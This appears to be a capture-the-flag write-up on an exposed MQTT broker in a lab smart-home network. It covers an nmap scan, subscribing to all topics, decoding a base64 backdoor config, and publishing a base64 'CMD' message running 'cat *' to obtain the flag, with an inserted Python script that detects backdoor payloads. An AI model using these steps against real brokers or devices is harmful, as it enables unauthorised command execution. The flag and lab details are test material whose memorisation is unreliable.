Note
John was working on his smart home appliances when he noticed weird traffic going across the network. Can you help him figure out what these weird network communications are?
nmap
nmap -A -sV -p- 10.10.85.233
Output:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-07 19:03 CET
Nmap scan report for 10.10.85.233
Host is up (0.034s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
1883/tcp open mosquitto version 2.0.14
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/messages/received: 59
| patio/lights: {"id":9498615153902037727,"color":"RED","status":"OFF"}
| $SYS/broker/version: mosquitto version 2.0.14
| $SYS/broker/shared_subscriptions/count: 0
| $SYS/broker/load/publish/dropped/15min: 0.00
| $SYS/broker/load/sockets/1min: 3.22
| $SYS/broker/bytes/sent: 3994
| $SYS/broker/clients/inactive: 0
| $SYS/broker/load/messages/sent/15min: 7.77
| $SYS/broker/load/publish/sent/5min: 11.59
| $SYS/broker/load/sockets/15min: 0.26
| $SYS/broker/clients/connected: 2
| $SYS/broker/load/bytes/received/5min: 540.82
| $SYS/broker/load/messages/sent/5min: 22.75
| $SYS/broker/clients/total: 2
| $SYS/broker/load/publish/received/15min: 0.00
| $SYS/broker/uptime: 33 seconds
| $SYS/broker/subscriptions/count: 3
| $SYS/broker/publish/bytes/received: 1981
| $SYS/broker/messages/sent: 142
| $SYS/broker/store/messages/bytes: 296
| $SYS/broker/load/publish/dropped/1min: 0.00
| $SYS/broker/clients/active: 2
| $SYS/broker/load/messages/received/15min: 3.86
| $SYS/broker/store/messages/count: 52
| $SYS/broker/load/publish/sent/15min: 3.91
| $SYS/broker/publish/messages/dropped: 0
| $SYS/broker/clients/disconnected: 0
| $SYS/broker/publish/bytes/sent: 675
| $SYS/broker/publish/messages/received: 0
| $SYS/broker/publish/messages/sent: 84
| $SYS/broker/load/sockets/5min: 0.76
| livingroom/speaker: {"id":4007409197343670969,"gain":45}
| $SYS/broker/load/publish/sent/1min: 53.91
| $SYS/broker/load/bytes/sent/15min: 189.97
| $SYS/broker/load/publish/received/5min: 0.00
| $SYS/broker/load/bytes/received/15min: 187.07
| $SYS/broker/load/bytes/sent/5min: 561.92
| $SYS/broker/load/publish/received/1min: 0.00
| $SYS/broker/clients/maximum: 2
| $SYS/broker/load/publish/dropped/5min: 0.00
| $SYS/broker/bytes/received: 2859
| $SYS/broker/load/messages/received/1min: 45.29
| kitchen/toaster: {"id":14194221257404514717,"in_use":false,"temperature":153.88422,"toast_time":272}
| yR3gPp0r8Y/AGlaMxmHJe/qV66JF5qmH/config: eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==
| $SYS/broker/load/messages/sent/1min: 99.20
| $SYS/broker/messages/stored: 52
| $SYS/broker/load/messages/received/5min: 11.17
| $SYS/broker/load/connections/5min: 0.58
| $SYS/broker/load/connections/1min: 2.46
| $SYS/broker/load/bytes/sent/1min: 2587.53
| $SYS/broker/retained messages/count: 51
| $SYS/broker/clients/expired: 0
| $SYS/broker/load/bytes/received/1min: 2188.79
| $SYS/broker/load/connections/15min: 0.20
|_ storage/10.10.85.233thermostat: {"id":2291235996486415869,"temperature":23.365356}
Port 1883 is open, running mosquitto version 2.0.14.
Nmap's mqtt-subscribe script also connected to the broker and listed the topics with their most recent payloads.
Documentation
https://cs.pomona.edu/classes/po181u/docs/labs/lab4/
I have to install mosquitto:
sudo pacman -S mosquitto
- mosquitto_pub : for publishing to MQTT servers
- mosquitto_sub : for subscribing to MQTT servers
- -h : mqtt host to connect to. Defaults to localhost
- -t : mqtt topic to publish/subscribe to
- -m : mqtt message body for publication
- -v : print published messages verbosely
Get base64 string
I'm looking for all the data with mosquitto_sub.
mosquitto_sub -h 10.10.85.233 -t "#"
echo eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ== |base64 -d
Output:
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","registered_commands":["HELP","CMD","SYS"],"pub_topic":"U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub","sub_topic":"XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"}
The ID is: cdd1b1c0-1c40-4b0f-8e22-61b357548b7d
registered_commands: CMD should be useful for us.
pub_topic: U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub
sub_topic: XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub
Now we can try to publish a command. We also need to keep the subscriber listening so we see the reply.
Send a command
Subscriber
mosquitto_sub -h 10.10.85.233 -t "#"
Publisher
mosquitto_pub -h 10.10.85.233 -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eqrgijkosrgfuheqrguirgequi"
Decode the reply the subscriber received
echo SW52YWxpZCBtZXNzYWdlIGZvcm1hdC4KRm9ybWF0OiBiYXNlNjQoeyJpZCI6ICI8YmFja2Rvb3IgaWQ+IiwgImNtZCI6ICI8Y29tbWFuZD4iLCAiYXJnIjogIjxhcmd1bWVudD4ifSk= |base64 -d
Output:
Invalid message format.
Format: base64({"id": "<backdoor id>", "cmd": "<command>", "arg": "<argument>"})
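Both the config payload and the error reply above give away the shape of the backdoor's messages, which is enough to monitor a broker for them. The following is an added detection example, not part of the original writeup: it parses `mosquitto_sub -v` output and labels base64-wrapped JSON payloads by the three shapes seen so far. The topic names and the config fields are the ones from the scan; the command and response lines in the sample are constructed.

```python
import base64
import json

def decode_b64_json(payload: str):
    """Return the dict if payload is base64 wrapping a JSON object, else None."""
    try:
        obj = json.loads(base64.b64decode(payload, validate=True).decode("utf-8"))
    except ValueError:  # not base64 (binascii.Error), not UTF-8, or not JSON
        return None
    return obj if isinstance(obj, dict) else None

def classify(payload: str) -> str:
    """Label a payload by the three message shapes the broker exposed above."""
    obj = decode_b64_json(payload)
    if obj is None:
        return "plain"
    keys = set(obj)
    if {"registered_commands", "pub_topic", "sub_topic"} <= keys:
        return "backdoor-config"    # advertises its command set and pub/sub topics
    if {"id", "cmd", "arg"} <= keys:
        return "backdoor-command"   # the format the "Invalid message format" reply describes
    if keys == {"id", "response"}:
        return "backdoor-response"
    return "b64-json"

def scan_sub_output(text: str) -> dict:
    """Parse `mosquitto_sub -v` lines ("topic payload") into {topic: label}."""
    labels = {}
    for line in text.splitlines():
        topic, _, payload = line.partition(" ")
        if topic:
            labels[topic] = classify(payload)
    return labels

def b64(obj) -> str:
    """Encode a JSON object the way the backdoor expects its messages."""
    return base64.b64encode(json.dumps(obj).encode()).decode()

# Constructed sample of `mosquitto_sub -v -t '#'` output. Topics and the config
# fields come from the scan; the command and response lines are made up.
SAMPLE = "\n".join([
    "$SYS/broker/clients/connected 2",
    'patio/lights {"id":9498615153902037727,"color":"RED","status":"OFF"}',
    "yR3gPp0r8Y/AGlaMxmHJe/qV66JF5qmH/config " + b64({
        "id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d",
        "registered_commands": ["HELP", "CMD", "SYS"],
        "pub_topic": "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub",
        "sub_topic": "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"}),
    "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub " + b64({"id": "x", "cmd": "HELP", "arg": ""}),
    "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub " + b64({"id": "x", "response": "ok"}),
])
```

Pipe a live capture in with `mosquitto_sub -v -h <broker> -t '#' | python3 -c '...'` and any topic labelled `backdoor-*` is worth a look; the random-looking topic names are themselves a hint.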
Use the backdoor
We need to build a message in that format and encode it in base64.
echo '{"id": "4879005204976514238", "cmd": "CMD", "arg": "cat *"}' |base64
Output:
eyJpZCI6ICI0ODc5MDA1MjA0OTc2NTE0MjM4IiwgImNtZCI6ICJDTUQiLCAiYXJnIjogImNhdCAq
In0K
This will be our message.
mosquitto_pub -h 10.10.85.233 -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eyJpZCI6ICI0ODc5MDA1MjA0OTc2NTE0MjM4IiwgImNtZCI6ICJDTUQiLCAiYXJnIjogImNhdCAqIn0K"
Flag
echo eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZ3sxOGQ0NGZjMDcwN2FjOGRjOGJlNDViYjgzZGI1NDAxM31cbiJ9 |base64 -d
Output:
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"flag{18d44fc0707ac8dc8be45bb83db54013}\n"}